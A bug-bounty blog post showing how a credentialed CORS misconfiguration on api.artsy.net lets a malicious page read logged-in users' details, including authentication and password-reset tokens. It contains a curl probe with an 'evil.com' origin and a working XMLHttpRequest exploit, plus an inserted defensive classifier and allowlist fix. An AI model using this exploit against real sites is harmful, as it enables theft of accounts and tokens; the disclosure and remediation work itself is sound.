Exploiting Insecure Cross Origin Resource Sharing ( CORS ) | api.artsy.net

This post is published by Muhammad Khizer Javed as a contributor on BugBountyPOC. Note that the post is written by Muhammad Khizer Javed, and any mistakes in it are his alone. We allow anyone to write content on our blog as a guest/contributor so that others can also learn. If you're interested in sharing your findings through the Bug Bounty POC platform, just sign up on the blog and you can post freely.

Hello BugBountyPOC viewers, this is Khizer. A few days ago I was testing different sites for CORS (Cross-Origin Resource Sharing) issues so that I could see what it actually is; it took me about a week to understand it from different sources and blogs. I found a website that was vulnerable and tried to see what I could do with the CORS issue on it.

To test the website for a CORS issue I first used curl, sending a request with an arbitrary Origin header and looking at the response headers only:

curl https://api.artsy.net -H "Origin: https://evil.com" -I

[Image: curl output used to check CORS]

As you can see, the response to the curl request includes

Access-Control-Allow-Credentials: true

and

Access-Control-Allow-Origin: https://evil.com

This means the server reflects whatever Origin it is given and also allows credentials, so the website is vulnerable to a CORS attack. I then followed up with GeekBoy's blog post, as he clearly shares the exploit for this kind of CORS issue. I found an API endpoint where I could see the details of the logged-in user:

https://api.artsy.net/api/user_details/

I used the exploit code shared by GeekBoy to check whether I could export user info from that endpoint, which includes:

id, date created, email, birthday, phone, authentication_token, reset_password_token, collections, devices, etc.

[Image: API response disclosing user data]

Exploit code:

function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Show the cross-origin response that the browser allowed the page to read
      document.getElementById("demo").innerText = this.responseText;
      alert(this.responseText);
    }
  };
  xhttp.open("GET", "https://api.artsy.net/api/user_details/<User-ID>", true);
  xhttp.withCredentials = true; // send the logged-in user's cookies with the request
  xhttp.send();
}

I uploaded the exploit with my PoC to my website.

[Image: Exploiting Cross Origin Resource Sharing]


And now, if a logged-in user opens the exploit page on my website, their account information will be exported to my website.

[Image: Exploiting Insecure CORS]
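As an added example (not part of the original post, and not Artsy's code): the check the curl command above performs, expressed as a classifier over a response's CORS headers, alongside the allowlist logic a server should use instead of reflecting the Origin. The probe origin, the allowlist and the sample headers are constructed for this example.

```javascript
// Classify a response's CORS headers for a probe origin that the server has no
// reason to trust (the post uses https://evil.com). Header names are
// case-insensitive, so they are normalised before lookup.
function classifyCors(probeOrigin, headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v).trim();
  const acao = h["access-control-allow-origin"];
  const credentials = h["access-control-allow-credentials"] === "true";
  if (acao === undefined) return "no-cors";
  // Browsers refuse credentialed responses with "*", so this is a
  // misconfiguration but not the credentialed read the post demonstrates.
  if (acao === "*") return credentials ? "wildcard-with-credentials" : "public";
  // "null" can be produced by sandboxed iframes and data: URLs, so trusting it
  // with credentials is as bad as reflecting an arbitrary origin.
  if (acao === "null") return credentials ? "null-origin-with-credentials" : "null-origin";
  // The untrusted probe origin came back verbatim: the server reflects Origin.
  if (acao === probeOrigin) return credentials ? "reflected-with-credentials" : "reflected";
  return "restricted";
}

// Constructed sample mirroring the two headers quoted in the post.
const sampleResponse = {
  "Access-Control-Allow-Origin": "https://evil.com",
  "Access-Control-Allow-Credentials": "true",
};

// Remediation on the server side: echo an origin only if it matches an explicit
// allowlist exactly (no prefix, suffix or regex matching), and send Vary: Origin
// so shared caches do not serve one origin's response to another.
const ALLOWED_ORIGINS = new Set(["https://www.example.com"]); // constructed
function corsHeadersFor(requestOrigin) {
  if (!ALLOWED_ORIGINS.has(requestOrigin)) return { "Vary": "Origin" };
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}
```

The classifier is only meaningful when the probe origin is one the server should not trust; a reflected allowlisted origin is correct behaviour.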

[Video]

At the end I would like to thank GeekBoy and all the other blog posts that helped me understand and exploit this issue successfully.

Thanks,

Muhammad Khizer Javed

10 Responses

    • MuhammadKhizerJaved says:

      Well, they didn't give anything, as they said it's valid and then they said it's a duplicate of an internal finding, so I thought I should share it with you guys.

      • Ravi says:

        Many companies say it's a duplicate or not valid; don't know whether they are fixing it silently or are not serious about security.

  1. Anas Roubi says:

    Very nice bro keep it up

  2. Duc Nguyen says:

    Hi Muhammad,

    I checked this exploit on my target, but it doesn't work with an Authorization bearer header.

    So do you know how we can bypass this? (withCredentials was set to true)

  3. Ranjana says:

    How to remediate this issue?

  4. Yusuf says:

    Amazing PoC Bro…
